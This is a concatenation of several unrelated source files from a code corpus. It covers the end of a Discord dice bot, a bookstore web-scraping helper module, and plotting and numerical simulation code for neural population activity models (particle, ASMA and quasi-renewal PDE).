'It is also possible to sum or prod the result of a dice roll: \"+3xD4\"'.format(message))
elif command == 'hi':
await message.channel.send('Hi {0.author.mention}, roll a dice?'.format(message))
else:
await message.channel.send('Hi {0.author.mention}, I don\'t recognise your humble request. If you want help, try !help'.format(message))
@client.event
async def on_ready():
print('Bot \"'+client.user.name+'\" logged into discord')
print('Bot User Id: '+str(client.user.id))
print('---beginning operations---')
client.run(BOT_TOKEN)
``` |
{
"source": "jokruger/bookstore-scraping",
"score": 3
} |
#### File: bookstore-scraping/src/tools.py
```python
import logging, requests, time, csv, datetime, os
from src import cache, languages
def init_logging(name):
logFormatter = logging.Formatter('%(asctime)s [%(levelname)s] %(message)s')
rootLogger = logging.getLogger()
fileHandler = logging.FileHandler('scrape.' + name + '.log')
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
rootLogger.setLevel(logging.DEBUG)
def init_wd():
today = datetime.date.today().strftime('%Y-%m-%d')
path = './data/' + today
if not os.path.exists(path):
os.makedirs(path)
return path
@cache.memoize(typed=True, expire=60*60*12)
def get_idx_page(url):
#time.sleep(1)
return requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'})
@cache.memoize(typed=True, expire=60*60*24*28)
def get_page(url):
#time.sleep(1)
return requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'})
def is_year(s):
return len(s) == 4 and s.isdigit()
def make_csv(path):
f = open(path, 'w')
w = csv.writer(f, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
w.writerow(['Site', 'Link', 'Name', 'Author', 'Publisher', 'Year', 'Language'])
return w
def save_row(writer, site, link, name, author, publisher, year, language):
writer.writerow([site, link, name, author, publisher, year, language])
def save_book(writer, site, link, name, author, publisher, year, language):
books = 0
records = 0
if name and language:
for l in language.split(','):
save_row(writer, site, link, name, author, publisher, year, l)
records += 1
books += 1
else:
logging.error('unable to process book page: ' + link)
return (books, records)
def parse_language(l):
r = []
ls = l.lower()
if ', ' in ls:
ls = ls.split(', ')
elif ' / ' in ls:
ls = ls.split(' / ')
else:
ls = [ls]
for i in ls:
if i in languages:
r.append(languages[i])
else:
logging.error('unknown language: ' + i)
return ','.join(r)
``` |
{
"source": "joksnet/ludumdare34",
"score": 3
} |
#### File: ludumdare34/grbox/sprites.py
```python
from pygame import Surface, Rect, draw
from pygame.font import SysFont
from pygame.image import load as load_image
from pygame.sprite import Sprite, spritecollide
from random import randint
from .data import imagefruit
class HorizonLine(Sprite):
def __init__(self, color, height=4):
Sprite.__init__(self)
self.image = Surface((640, height))
self.image.fill(color)
self.rect = self.image.get_rect()
self.rect.top = 384
class Box(Sprite):
def __init__(self, color, mass):
Sprite.__init__(self)
self.grow = True
self.color = color
self.size = mass * 10
self.mass = mass
self.image = Surface((self.size, self.size))
self.image.fill(color)
draw.rect(self.image, (0,0,0), (0, 0, self.size, self.size), 1)
self.rect = self.image.get_rect()
self.rect.center = (320, 344)
self.acceleration = 2
self.velocity = 0
self.time = 0
self.vpos = self.rect.top
def set_velocity(self, velocity):
self.acceleration = 2 if velocity else 0
self.velocity = velocity
self.time = 0
self.vpos = self.rect.top
def uplevel(self):
if not self.grow:
return
self.mass += 1
self.size = self.mass * 10
self.image = Surface((self.size, self.size))
self.image.fill(self.color)
draw.rect(self.image, (0,0,0), (0, 0, self.size, self.size), 1)
def update(self, group=None):
collide = spritecollide(self, group, False)
self.rect.width = self.size
self.rect.height = self.size
hit_floor = False
if group and collide:
for sprite in collide:
if type(sprite) is HorizonLine:
hit_floor = True
else:
group.remove(sprite)
self.uplevel()
if self.acceleration:
self.rect.top = self.vpos \
+ (self.velocity * self.time) \
+ (self.acceleration / 2) * (self.time ** 2)
self.time += 1
if hit_floor or not self.acceleration:
self.rect.bottom = 384
self.set_velocity(0)
def draw(self, screen):
screen.blit(self.image, self.rect)
class Dialog(Sprite):
def __init__(self, texts):
Sprite.__init__(self)
width = 0
height = 0
space = 6
between = 3
font = SysFont("monospace", 18)
for text in texts:
f_width, f_height = font.size(text)
height += f_height + between
if f_width > width:
width = f_width
self.image = Surface((width + space * 2, height + space * 2))
self.image.fill((255, 255, 255))
self.rect = self.image.get_rect()
draw.rect(self.image, (0,0,0), self.rect, 1)
top = space
for text in texts:
self.image.blit(font.render(text, 1, (0, 0, 0)), (space, top))
top += font.get_linesize() + between
def update(self, follow):
self.rect.left = follow.rect.right + 6
self.rect.bottom = follow.rect.top - 6
def draw(self, screen):
screen.blit(self.image, self.rect)
class Fruit(Sprite):
VERTICAL = 1
SIDE_WEST = 2
SIDE_EAST = 3
LITTLE = "little"
MEDIUM = "medium"
NORMAL = "normal"
def __init__(self, name, size, direction, position, speed=None):
Sprite.__init__(self)
self.image = load_image(imagefruit(name, size))
self.image.set_colorkey((255, 0, 255))
self.rect = self.image.get_rect()
self.direction = direction
if direction == Fruit.VERTICAL:
self.rect.centerx = position
else:
self.rect.centery = position
if direction == Fruit.SIDE_WEST:
self.rect.left = 640
if not speed:
speed = 1
if name == Fruit.MEDIUM:
speed += 1
if name == Fruit.LITTLE:
speed += 4
self.speed = speed
def update(self):
if self.direction == Fruit.VERTICAL:
self.rect.top += self.speed
elif self.direction == Fruit.SIDE_WEST:
self.rect.left -= self.speed
elif self.direction == Fruit.SIDE_EAST:
self.rect.left += self.speed
class RandomFruit(Fruit):
names = ['apple', 'cherry', 'strawberry']
def __init__(self, size, direction=None, position=None):
name = RandomFruit.names[randint(0, 2)]
if not direction:
direction = randint(1, 3)
if not position:
if direction == Fruit.VERTICAL:
position = randint(8, 632)
else:
position = randint(8, 376)
Fruit.__init__(self, name, size, direction, position)
``` |
{
"source": "jokteur/ASMA",
"score": 2
} |
#### File: plots/final/activity.py
```python
import time
import copy
import os
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.text as mtext
from matplotlib import gridspec
from matplotlib.animation import FuncAnimation
import matplotlib.animation as animation
import matplotlib
import flowrect
from flowrect.simulations.util import calculate_age, calculate_mt, eta_SRM, moving_average
from flowrect.simulations import (
particle_population_nomemory,
ASA1,
quasi_renewal_pde,
)
# params["Gamma"] = params["Gamma"] / params["Lambda"]
def plot_activity(
params,
time_before_input,
ylim,
N,
w=None,
a_cutoff=7,
plot_QR=True,
I_ylim=None,
params_p=None,
plot_I=True,
plot_H=False,
savepath="",
savename="",
save=False,
usetex=False,
figsize=(8, 8),
inset=None,
dpi=None,
title=None,
loc="best",
font_family="serif",
font_size="12",
noshow=False,
):
if usetex:
plt.rc("text", usetex=True)
plt.rc("font", family=font_family, size=font_size)
matplotlib.rcParams["text.latex.preamble"] = [r"\usepackage{amsmath}"]
dt = params["dt"]
I_time = params["I_ext_time"]
base_I = params["base_I"]
I_ext = params["I_ext"]
I_ext_vec = np.concatenate(
(
base_I * np.ones(int(I_time / dt)),
(base_I + I_ext) * np.ones(int((params["time_end"] - I_time) / dt)),
)
)
if not params_p:
params_p = params
# Particle simulation
t = time.time()
ts_P, A, H, _ = particle_population_nomemory(**params_p, N=N)
print(f"Particle simulation done in {time.time()- t:.2f}s")
# ASMA simulation
t = time.time()
(ts_ASMA, a_grid_ASMA, rho_t_ASMA, m_t_ASMA, h_t_ASMA, en_cons_ASMA, A_t_ASMA,) = ASA1(
a_cutoff=a_cutoff,
**params,
)
print(f"ASMA simulation done in {time.time()- t:.2f}s")
ts_QR, h_t_QR, A_t_QR = None, None, None
if plot_QR:
# QR pde
t = time.time()
ts_QR, _, _, h_t_QR, _, A_t_QR = quasi_renewal_pde(
**params,
a_cutoff=a_cutoff,
)
print(f"QR simulation done in {time.time()- t:.2f}s")
begin_idx = int((params["I_ext_time"] - time_before_input) / params["dt"])
begin_P_idx = int((params_p["I_ext_time"] - time_before_input) / params_p["dt"])
num_plots = 1 + int(plot_I) + int(plot_H)
if num_plots == 1:
height_ratios = [1]
elif num_plots == 2:
height_ratios = [5, 1]
else:
height_ratios = [5, 1, 1]
fig = plt.figure(figsize=figsize)
gs = gridspec.GridSpec(num_plots, 1, height_ratios=height_ratios)
ax1 = plt.subplot(gs[0])
if title:
ax1.set_title(title)
plots = dict()
if w:
new_A = moving_average(A, w)
(plots["p"],) = ax1.plot(
ts_P[begin_P_idx + w // 2 - 1 : -w // 2],
new_A[begin_P_idx:],
"--k",
label=r"$25\cdot10^3$ neurons",
)
else:
(plots["p"],) = ax1.plot(
ts_P[begin_P_idx:], A[begin_P_idx:], "--k", label=r"$25\cdot10^3$ neurons"
)
(plots["ASMA"],) = ax1.plot(ts_ASMA[begin_idx:], A_t_ASMA[begin_idx:], "-r", label="ASMA")
if plot_QR:
(plots["QR"],) = ax1.plot(ts_QR[begin_idx:], A_t_QR[begin_idx:], "-b", label="QR")
ax1.set_ylim(ylim[0], ylim[1])
ax1.set_xlim(ts_ASMA[begin_idx], ts_ASMA[-1])
ax1.set_ylabel(r"Activity $A_t$ (Hz)")
if num_plots == 1:
ax1.set_xlabel(r"Time $t$ (s)")
else:
ax1.tick_params(direction="in")
if inset:
x1, x2, y1, y2 = inset[1]
axins = ax1.inset_axes(inset[0])
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
if w:
w = 3
new_A = moving_average(A, w)
axins.plot(
ts_P[begin_P_idx + w // 2 - 1 : -w // 2],
new_A[begin_P_idx:],
"--k",
label=r"$25\cdot10^3$ neurons",
)
else:
axins.plot(ts_P[begin_P_idx:], A[begin_P_idx:], "--k", label=r"$25\cdot10^3$ neurons")
axins.plot(ts_ASMA[begin_idx:], A_t_ASMA[begin_idx:], "-r", label="ASMA")
if plot_QR:
axins.plot(ts_QR[begin_idx:], A_t_QR[begin_idx:], "-b", label="QR")
axins.set_xticklabels("")
axins.set_yticklabels("")
ax1.indicate_inset_zoom(axins, edgecolor="black")
ax1.legend(handles=plots.values(), loc=loc)
i = 1
I_ylim = I_ylim if I_ylim else (base_I + I_ext) * 1.1
if plot_H:
ax = plt.subplot(gs[i], sharex=ax1)
i += 1
ax.set_ylim(0, I_ylim)
ax.plot(ts_P[begin_idx:], H[begin_idx:], "--k")
ax.plot(ts_ASMA[begin_idx:], h_t_ASMA[begin_idx:], "-r")
if plot_QR:
ax.plot(ts_QR[begin_idx:], h_t_QR[begin_idx:], "-b")
ax.set_ylabel(r"$h_t$ (mV)")
ax.tick_params(direction="in")
if i == num_plots:
ax.tick_params(direction="out")
ax.set_xlabel(r"Time $t$ (s)")
if plot_I:
ax = plt.subplot(gs[i], sharex=ax1)
i += 1
ax.set_ylim(0, I_ylim)
ax.plot(ts_ASMA[begin_idx:], I_ext_vec[begin_idx:], "-k")
ax.set_xlabel(r"$t$ (s)")
ax.set_ylabel(r"$I^{\text{ext}}$ (A)")
ax.tick_params(direction="in")
if i == num_plots:
ax.tick_params(direction="out")
ax.set_xlabel(r"Time $t$ (s)")
if save:
if dpi:
fig.savefig(os.path.join(savepath, savename), dpi=dpi, transparent=True)
else:
fig.savefig(os.path.join(savepath, savename), transparent=True)
if not noshow:
plt.show()
```
#### File: plots/final/A_inf.py
```python
import time
import copy
import os
from multiprocessing import Pool
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import matplotlib.animation as animation
import flowrect
from flowrect.simulations.util import calculate_age, calculate_mt, eta_SRM, moving_average
from flowrect.simulations import (
particle_population_nomemory,
ASA1,
quasi_renewal_pde,
)
def _simulate_QR(args):
I_ext, params, a_cutoff = args
t = time.time()
params["I_ext"] = I_ext
ts_QR, _, _, _, _, A_QR = quasi_renewal_pde(a_cutoff=a_cutoff, **params)
print(f"I_ext = {I_ext:.2f}, QR done in {time.time() -t:.2f}s")
Ainf_QR = A_QR[-1]
return Ainf_QR
def _simulate_pdes(args):
I_ext, params, a_cutoff = args
t = time.time()
params["I_ext"] = I_ext
ts_PDE, _, _, _, _, _, A_PDE = ASA1(a_cutoff=a_cutoff, **params)
print(f"I_ext = {I_ext:.2f}, PDE done in {time.time() -t:.2f}s")
Ainf_PDE = A_PDE[-1]
return Ainf_PDE
def _simulate_particle(args):
I_ext, params, N, w = args
t = time.time()
cparams = copy.copy(params)
cparams["I_ext"] = I_ext
ts_P, A_P, _, _ = particle_population_nomemory(N=N, **cparams)
dt = ts_P[1] - ts_P[0]
new_A = A_P
if w:
new_A = moving_average(A_P, w)
# Take the last seconds in activity
last_seconds_idx = len(new_A) - 1 - int(1 / dt * 5)
last_A_P = new_A[last_seconds_idx:]
Ainf_P = np.mean(last_A_P)
Ainf_std_P = np.std(last_A_P)
print(f"I_ext = {I_ext:.2f}, Particle done in {time.time() -t:.2f}s")
return Ainf_P, Ainf_std_P
def plot_A_inf(
params,
N,
pool,
num_sim=30,
num_p_sim=10,
I_end=5,
w=None,
cache_path="cache",
cache_suppl_name="",
QR_params=None,
p_params=None,
a_cutoff=7,
savepath="",
savename="",
save=False,
usetex=False,
figsize=(8, 8),
dpi=None,
title=None,
font_family="serif",
font_size="12",
noshow=False,
):
if usetex:
plt.rc("text", usetex=True)
plt.rc("font", family=font_family, size=font_size)
# External input range
I_vec = np.linspace(0, I_end, num_sim)
I_vec_p = np.linspace(0, I_end, num_p_sim)
# Parameters
if not p_params:
p_params = copy.deepcopy(params)
if not QR_params:
QR_params = copy.deepcopy(params)
# Check for cache
t = time.time()
params_multi_pde = [(I_vec[i], params, a_cutoff) for i in range(len(I_vec))]
pde_res = pool.map(_simulate_pdes, params_multi_pde)
params_multi_QR = [(I_vec[i], QR_params, a_cutoff) for i in range(len(I_vec))]
QR_res = pool.map(_simulate_QR, params_multi_QR)
params_multi_p = [(I_vec_p[i], p_params, N, w) for i in range(len(I_vec_p))]
p_res = pool.map(_simulate_particle, params_multi_p)
Ainf_PDE = []
Ainf_QR = []
Ainf_P = []
Ainf_std_P = []
# Fetch results
for A_PDE in pde_res:
Ainf_PDE.append(A_PDE)
for A_QR in QR_res:
Ainf_QR.append(A_QR)
for A_P, A_std_P in p_res:
if A_P:
Ainf_P.append(A_P)
Ainf_std_P.append(A_std_P)
plt.figure()
if title:
plt.title(title)
plt.plot(I_vec, Ainf_PDE, "-r", label="ASMA")
plt.plot(I_vec, Ainf_QR, "-b", label="QR")
plt.errorbar(I_vec_p, Ainf_P, Ainf_std_P, fmt=".k", capsize=2.0, label=r"$25\cdot10^3$ neurons")
plt.xlabel(r"$I_1$ (A)")
plt.ylabel(r"$A_{\infty}$ (Hz)")
plt.legend()
plt.tight_layout()
if save:
if dpi:
plt.savefig(os.path.join(savepath, savename), dpi=dpi, transparent=True)
else:
plt.savefig(os.path.join(savepath, savename), transparent=True)
if not noshow:
plt.show()
```
#### File: plots/midterm/activity.py
```python
import time
import copy
import os
from multiprocessing import Pool
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import gridspec
from matplotlib.animation import FuncAnimation
import matplotlib.animation as animation
import flowrect
from flowrect.simulations.util import calculate_age, calculate_mt, eta_SRM
from flowrect.simulations import particle_population
from flowrect.simulations import flow_rectification
from flowrect.simulations import quasi_renewal
save = False
save_path = ""
save_name = "activity.pdf"
def moving_average(x, w):
return np.convolve(x, np.ones(w), "valid") / w
dt = 1e-2
N = 25000
I_ext = 2.5
# Take similar as in article
time_end = 40
params = dict(
time_end=time_end,
dt=dt,
Lambda=[1.0, 5.5],
Gamma=[-4.0, -1.0],
# Lambda=np.array([28.0, 8.0, 1.0]),
# Gamma=np.array([-3.5, 3.0, -1.0]),
c=1,
lambda_kappa=2,
I_ext=I_ext,
I_ext_time=20,
interaction=0,
)
print(f"QR approximation")
QR_params = copy.copy(params)
QR_params["dt"] = 1e-2
t = time.time()
ts_QR, A_QR, cutoff = quasi_renewal(**QR_params)
print(f"{time.time() - t:.2f}s")
print(f"Particle simulation")
t = time.time()
ts, M, spikes, A, X = particle_population(**params, N=N, Gamma_ext=True)
m_t = calculate_mt(M, spikes)
A_av = moving_average(A, 50)
# m_ts = np.zeros(m_t.T.shape)
# w = 50
# m_ts[: -w + 1, 0] = moving_average(m_t.T[:, 0], w)
# m_ts[: -w + 1, 1] = moving_average(m_t.T[:, 1], w)
# m_ts[-w + 1 :, :] = m_ts[-w, :]
print(f"{time.time() - t:.2f}")
print(f"Flow rectification approximation")
t = time.time()
ts, a_grid, rho_t, m_t_exact, x_t, en_cons, A_t = flow_rectification(a_cutoff=10, **params)
print(f"{time.time() - t:.2f}s")
I_ext_vec = np.concatenate((np.zeros(int(len(ts) / 2)), I_ext * np.ones(int(len(ts) / 2))))
from_t = int(5 / dt)
fig = plt.figure(figsize=(8, 8))
gs = gridspec.GridSpec(2, 1, height_ratios=[5, 1])
ax1 = plt.subplot(gs[0])
# fig.suptitle(r"Activity response to a step input ($\Delta t=10^{-2}$)")
(A_1,) = ax1.plot(ts[from_t:], A[from_t:], "--k", linewidth=0.5, label=f"Particle ({N=})")
(A_2,) = ax1.plot(ts[from_t : len(A_av)], A_av[from_t:], "--r", label="P. rolling av.")
(A_3,) = ax1.plot(ts[from_t:], A_t[from_t:], "-.g", linewidth=1.5, label="PDE")
(A_4,) = ax1.plot(ts_QR[from_t:], A_QR[from_t:], "-b", linewidth=1.5, label="QR")
ax1.set_ylim(0, 1.5)
ax1.set_ylabel(r"$A(t)$ (Hz)")
ax1.legend(handles=[A_1, A_2, A_3, A_4])
ax2 = plt.subplot(gs[1], sharex=ax1)
ax2.plot(ts[from_t:], I_ext_vec[from_t:], "-k")
ax2.set_xlabel(r"$t$ (s)")
ax2.set_xlim(5, time_end)
ax2.set_ylabel(r"$I_0$ (A)")
if save:
fig.savefig(os.path.join(save_path, save_name), transparent=True)
plt.show()
```
#### File: plots/midterm/particle_animated.py
```python
import time
import copy
import os
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import gridspec
from matplotlib.animation import FuncAnimation
import matplotlib.animation as animation
import flowrect
from flowrect.simulations.util import calculate_age, calculate_mt, eta_SRM
from flowrect.simulations import particle_population, flow_rectification, quasi_renewal
# Plot saving parameters
save = False
save_path = ""
save_name = "leaky_mem_anim.mp4"
# Simulation parameters
N = 500
dt = 1e-3
params = dict(
time_end=10,
dt=dt,
# Lambda=[5.0, 2.5],
# Gamma=[-4.0, 1.0],
Lambda=np.array([28.0, 8.0, 1.0]),
Gamma=np.array([-3.5, 3.0, -1.0]),
c=10,
lambda_kappa=1,
I_ext=1,
I_ext_time=20,
interaction=0.1,
)
print(f"Particle simulation")
t = time.time()
ts, M, spikes, A, X = particle_population(**params, N=N, Gamma_ext=True)
print(f"{time.time() - t:.2f}")
# Animated plots
class AnimatedPlot:
def __init__(self, xlim=10, ylim=10):
self.fig = plt.figure(figsize=(6, 8))
gs = gridspec.GridSpec(2, 1, height_ratios=[5, 1])
self.fig.suptitle(fr"Leaky memory population simulation ($N=${N})")
self.ax1 = plt.subplot(gs[0])
self.ax2 = plt.subplot(gs[1])
self.xlim, self.ylim = xlim, ylim
self.plots = {}
def init_plot(self):
# M scatter plot
self.plots["scat"] = self.ax1.scatter([], [], c="r", s=0.4)
self.ax1.set_aspect("equal")
self.plots["title"] = self.ax1.text(
0.5,
0.85,
"",
bbox={"facecolor": "w", "alpha": 0.5, "pad": 5},
transform=self.ax1.transAxes,
ha="center",
)
self.ax1.set_xlabel(r"$M_1$ (mV)")
self.ax1.set_ylabel(r"$M_2$ (mV)")
self.ax1.set_xlim(-self.xlim, self.xlim)
self.ax1.set_ylim(-self.ylim, self.ylim)
# Activity plot
mask = spikes.T == 1
self.plots["vline"] = self.ax2.plot([], [], "-r", linewidth=1)[0]
for i in range(N):
self.ax2.eventplot(
ts[mask[i]],
lineoffsets=i + 0.5,
colors="black",
linewidths=0.5,
)
self.ax2.set_ylim(0, N)
self.ax2.set_xlabel(r"$t$ (s)")
self.ax2.set_ylabel(r"Spikes")
self.ax2.set_yticks([])
return tuple(self.plots.values())
def animate(self, i):
t = dt * i
# Scatter
self.plots["title"].set_text(fr"Time $t=${t:.2f}s")
self.plots["scat"].set_offsets(M[i, :, 0:2])
self.plots["vline"].set_data(np.array([t, t]), np.array([0, N]))
return tuple(self.plots.values())
# Scatter plot
lim = 10
pl = AnimatedPlot(xlim=lim, ylim=lim)
anim_int = 40
ani = animation.FuncAnimation(
pl.fig,
func=pl.animate,
frames=range(0, len(M), anim_int),
init_func=pl.init_plot,
interval=anim_int,
blit=True,
)
if save:
ani.save(os.path.join(save_path, save_name))
plt.show()
```
#### File: simulations/pdes/second_order.py
```python
import numpy as np
import time
from numba import jit, prange
from ..util import f_SRM
# Not used
# @jit(nopython=True, cache=True)
def _fast_pde(
time_end,
dt,
a_grid,
a_grid_size,
exp_La,
Lambda,
Gamma,
c,
Delta,
theta,
lambda_kappa,
I_ext,
I_ext_time,
interaction,
m_t0,
n_t0,
):
""""""
steps = int(time_end / dt)
dim = Gamma.shape[0]
# Init vectors
ts = np.linspace(0, time_end, steps)
rho_t = np.zeros((steps, a_grid_size)) # Probability density distribution
m_t = np.zeros((steps, dim)) # First moment vector
n_t = np.zeros((steps, dim, dim)) # Second moments vector
V_t = np.zeros((steps, dim, dim)) # Semi-definite covariance matrix
x_t = np.zeros(steps) # Interaction parameter
# Initial conditions
m_t[0] = m_t0
n_t[0] = n_t0
rho_t[0, 0] = 1 / dt # All the mass is concentrated at age 0 in the beginning of sim.
J = interaction # interaction = J from our equations
da = dt
# Precompute values
Lambda_i_plus_j = np.stack((Lambda,) * dim) + np.stack((Lambda,) * dim).T
exp_La_ij = np.exp(-np.einsum("ij,k->kij", Lambda_i_plus_j, a_grid))
# # Initial step
x_fixed = I_ext if I_ext_time == 0 else 0
m_t_sum = np.sum(exp_La * m_t[0], axis=1)
G0 = f_SRM(m_t_sum + x_t[0], c=c)
G1 = 0
G2 = 0
for s in range(1, steps):
x_fixed = I_ext if I_ext_time < dt * s else 0
# Basis calculations for the Gaussian moments
exp_variance = (V_t[s - 1] @ exp_La.T).T # Makes a (a_grid_size, dim) matrix
gauss_param = m_t[s - 1] + 0.5 * exp_variance # (a_grid_size, dim) matrix
# g corresponds to c * exp(h + e^-Lambda.a (m + 1/2 V e^-Lambda.a))
g = c * np.exp(x_t[s - 1] + np.sum(exp_La * gauss_param, axis=1)) # (a_grid_size,) vector
moment1 = m_t[s - 1] + exp_variance # (a_grid_size, dim) matrix
# Gaussian moments
G0 = g
G1 = (moment1.T * g).T
G2 = ((V_t[s - 1] + np.einsum("ij,ik->ijk", moment1, moment1)).T * g).T
# This values are reused in multiple calculations
LambdaGamma = Lambda * Gamma
# Store the expression that is in curly brackets for evolution of m_t
m_t_curly_bracket_expr = (exp_La - 1) * G1 + np.einsum("i,j->ji", LambdaGamma, G0)
m_t[s] = m_t[s - 1] + dt * np.einsum("ij,i->j", m_t_curly_bracket_expr, da * rho_t[s - 1])
# Update second moments
part_0moment = np.einsum("i,j,k->kij", LambdaGamma, LambdaGamma, G0)
part_1moment_ij = np.einsum("ki,j,ki->kij", exp_La, LambdaGamma, G1)
part_1moment_ji = np.einsum("kj,i,kj->kij", exp_La, LambdaGamma, G1)
part_2moment = (exp_La_ij - 1) * G2
moment_sum = part_0moment + part_1moment_ij + part_1moment_ji + part_2moment
n_t[s] = n_t[s - 1] + dt * np.sum(
np.einsum("i,ijk->ijk", rho_t[s - 1], moment_sum) * da,
axis=0,
)
# Update covariance matrix
V_t[s] = n_t[s] - np.outer(m_t[s], m_t[s])
# Update self interaction
x_t[s] = x_t[s - 1] + dt * (
-lambda_kappa * x_t[s - 1]
+ lambda_kappa * (np.sum(G0 * rho_t[s - 1] * da) * J + x_fixed)
)
rho_t[s] = rho_t[s - 1]
# Mass loss
intensity = np.clip(G0 * dt, 0, 1) # Limit transfer
mass_transfer = rho_t[s] * intensity
rho_t[s] -= mass_transfer
last_cell_mass = rho_t[s, -1] # Last cell necessarily spikes
# Linear transport
rho_t[s, 1:] = rho_t[s, :-1]
# Mass insertion
rho_t[s, 0] = np.sum(mass_transfer) + last_cell_mass
return ts, rho_t, m_t, n_t, x_t
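# Usage sketch for flow_rectification_2nd_order below (illustrative; the parameter
# values mirror those used in this repository's plotting scripts and are assumptions,
# not a prescribed configuration):
#   ts, a_grid, rho_t, m_t, n_t, x_t, cons, A = flow_rectification_2nd_order(
#       time_end=40, dt=1e-2, Lambda=[1.0, 5.5], Gamma=[-4.0, -1.0],
#       c=1, lambda_kappa=2, I_ext=2.5, I_ext_time=20)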
def flow_rectification_2nd_order(
time_end,
dt,
Lambda,
Gamma,
c=1,
Delta=1,
theta=0,
interaction=0,
lambda_kappa=20,
I_ext_time=0,
I_ext=0,
m_t0=0,
n_t0=0,
a_cutoff=5,
):
"""
Calculates the flow rectification of second order for an exponential firing function.
Parameters
----------
time_end : float
Number of seconds of the simulation
dt : float
Size of the time step in the simulation
(recommended values are between 1e-2 and 1e-3)
Lambda : 1D numpy array
Parameters of the exponential decay in the eta function
Lambda[0] = lambda_1 ; Lambda[1] = lambda_2 ; ...
c : float
base firing rate (in the firing function f(u) = c*exp(u))
lambda_kappa : float
exponential decay that is in the kappa function
I_ext : float
strength of an external constant current (must be specified along with I_ext_time)
I_ext_time : float
time (in seconds) at which the external constant current is injected
interaction : float
self-interaction strength
a_cutoff : float
maximum considered age in the simulation (in seconds)
"""
if isinstance(Gamma, (float, int)):
Gamma = [Gamma]
if isinstance(Lambda, (float, int)):
Lambda = [Lambda]
Gamma = np.array(Gamma)
Lambda = np.array(Lambda)
dim = Gamma.shape[0]
# Need dt = da
a_grid_size = int(a_cutoff / dt)
a_grid = np.linspace(0, a_cutoff, a_grid_size)
a_d_grid = np.vstack((a_grid,) * dim).T
# Shape must be in order: len, d, d
exp_La = np.exp(-Lambda * a_d_grid)
# Simulation
ts, rho_t, m_t, n_t, x_t = _fast_pde(
time_end,
dt,
a_grid,
a_grid_size,
exp_La,
Lambda,
Gamma,
c,
Delta,
theta,
lambda_kappa,
I_ext,
I_ext_time,
interaction,
m_t0,
n_t0,
)
energy_conservation = np.sum(rho_t * dt, axis=-1)
activity = rho_t[:, 0]
return ts, a_grid, rho_t, m_t, n_t, x_t, energy_conservation, activity
```
#### File: flowrect/simulations/util.py
```python
import numpy as np
from numba import jit
from numba.extending import overload
def moving_average(x, w):
print("moving_av")
return np.convolve(x, np.ones(w), "valid") / w
@jit(nopython=True)
def calculate_age(array):
ret = np.zeros(array.shape)
for i in range(array.shape[0]):
count = 0
for j in range(array.shape[1]):
count += 1
if array[i, j]:
count = 0
ret[i, j] = 0
continue
ret[i, j] = count
return ret
calculate_age(np.array([[0]]))
@jit(nopython=True)
def replace_NaN(array):
prev_value = np.zeros(array.shape[1])
for i in range(len(array)):
if np.isnan(array[i, 0]):
array[i] = prev_value
else:
prev_value = array[i]
return array
def calculate_mt(M, spikes):
m_t = np.copy(M)
mask = spikes == 0
m_t[mask] = np.NaN
m_t = np.nanmean(m_t, axis=1)
m_t = replace_NaN(m_t)
return m_t
def calculate_nt(m_t):
return np.einsum("ai,aj->aij", m_t, m_t)
calculate_mt(np.zeros((10, 5, 2)), np.zeros((10, 5)))
@jit(nopython=True, nogil=True)
def f_SRM(x, c=1, Delta=1, theta=0):
return np.exp(x / Delta) * c
@jit(nopython=True)
def eta_SRM(x, Gamma, Lambda, tau=1):
ret = np.zeros(len(x))
for d in range(len(Gamma)):
ret += Gamma[d] * np.exp(-Lambda[d] * x)
return ret
@jit(nopython=True)
def eta_SRM_no_vector(x, Gamma, Lambda, tau=1):
ret = 0
for d in range(len(Gamma)):
ret += Gamma[d] * np.exp(-Lambda[d] * x)
return ret
@jit(nopython=True)
def kappa_interaction(t, lambda_kappa, strength):
return strength * np.exp(-lambda_kappa * t)
def h_exp_update(h_t, A_t, I_ext, lambda_kappa, dt, J):
# Euler step of dh/dt = lambda_kappa * (J*A + I_ext - h): exponentially filtered input
return h_t + lambda_kappa * dt * (J * A_t + I_ext - h_t)
def h_erlang_update(h_t, k_t, A_t, I_ext, lambda_kappa, dt, J):
# Euler step of a two-stage (Erlang) cascade: k relaxes towards the input, h towards k
h = h_t + dt * lambda_kappa * (-h_t + k_t)
k = k_t + dt * lambda_kappa * (-k_t + J * A_t + I_ext)
return h, k
@overload(np.clip)
def np_clip(a, a_min, a_max, out=None):
def np_clip_impl(a, a_min, a_max, out=None):
if out is None:
out = np.empty_like(a)
for i in range(len(a)):
if a[i] < a_min:
out[i] = a_min
elif a[i] > a_max:
out[i] = a_max
else:
out[i] = a[i]
return out
return np_clip_impl
```
#### File: flowrect/widget/util.py
```python
import time
from abc import ABCMeta
from bokeh.models.widgets import Div
from bokeh.plotting import Figure
from bokeh.io import curdoc
class BaseElement(metaclass=ABCMeta):
""""""
instance_num = 0
def __init__(self, refresh_rate=100):
""""""
BaseElement.instance_num += 1
self._root = None
self._refresh_rate = refresh_rate
self._reset = False
def layout(self):
return self._root
def empty_placeholder():
return Div(text=" ")
class ThrottledEvent:
_callback = None
_lastcall = 0
_numcalls = 0
_total_time = 0
def __init__(self, fire_rate=None, refresh_rate=50):
"""fire_rate in ms"""
curdoc().add_periodic_callback(self._fire_event, refresh_rate)
if fire_rate:
self._dynamic_fire_rate = False
self._fire_rate = fire_rate / 1000
else:
self._dynamic_fire_rate = True
self._fire_rate = 0.05
def add_event(self, callback):
self._callback = callback
print(time.time() - self._lastcall, self._fire_rate)
if time.time() - self._lastcall > self._fire_rate:
t = time.time() - self._lastcall
print(f"Event added: {t}")
curdoc().add_next_tick_callback(self._call_and_measure)
def _call_and_measure(self):
self._numcalls += 1
self._lastcall = time.time()
prev = time.time()
self._callback()
